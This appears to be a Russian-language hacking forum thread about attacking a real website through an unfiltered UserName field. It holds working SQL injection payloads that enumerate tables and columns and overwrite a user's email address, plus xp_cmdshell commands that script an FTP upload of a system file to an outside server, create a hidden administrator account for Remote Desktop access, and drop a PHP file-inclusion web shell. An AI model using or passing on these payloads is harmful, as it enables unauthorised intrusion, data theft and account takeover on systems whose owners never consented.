Есть сайт, на нем поле UserName не фильтруется... запросом 1' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)-- узнаю имена таблиц 1' or 1=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users')-- так калонки как мне выполнить запрос: UPDATE users SET email_address='qwerty@gmail.com' WHERE user_name='hzhzhz'
1 or 1=(UPDATE users SET email_address='qwerty@gmail.com' WHERE user_name='hzhzhz') скорее всего у тебя просто прав не хватит
я сразу так делал: 1' or 1=(UPDATE users SET email_address='qwerty@gmail.com' WHERE user_name='hzhzhz')--
Обычно делают так: 1';UPDATE users SET email_address='qwerty@gmail.com' WHERE user_name='hzhzhz'-- Апдейт в подзапросах использовать нельзя.
еще вапрос, при запросе 1' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25admin%25')-- через секунд 15-20 выдает: можно как-нить обойти?
Да можно с помощью xp_cmdshell + ftp. Вообще если 3389 открыт то народ обычно админа делает себе и заходит через remote desctop. Как файлы заливать: exec master.dbo.xp_cmdshell 'echo open ftp.server.net > c:\ftp.ini' exec master.dbo.xp_cmdshell 'echo 123 ftp >> c:\ftp.ini' exec master.dbo.xp_cmdshell 'echo 123 ftp >> c:\ftp.ini' exec master.dbo.xp_cmdshell 'echo put c:\boot.ini >> c:\ftp.ini' exec master.dbo.xp_cmdshell 'echo bye >> c:\ftp.ini' exec master.dbo.xp_cmdshell ' ftp -i -s:c:\ftp.ini' Админа создавать: exec master.dbo.xp_cmdshell 'net user test test12345 /add' exec master.dbo.xp_cmdshell 'net localgroup administrators test /add' Если путь к сайту знаешь то через echo можешь создать файлик типа <?php include($_GET['i']); ?> Вообщем способов много.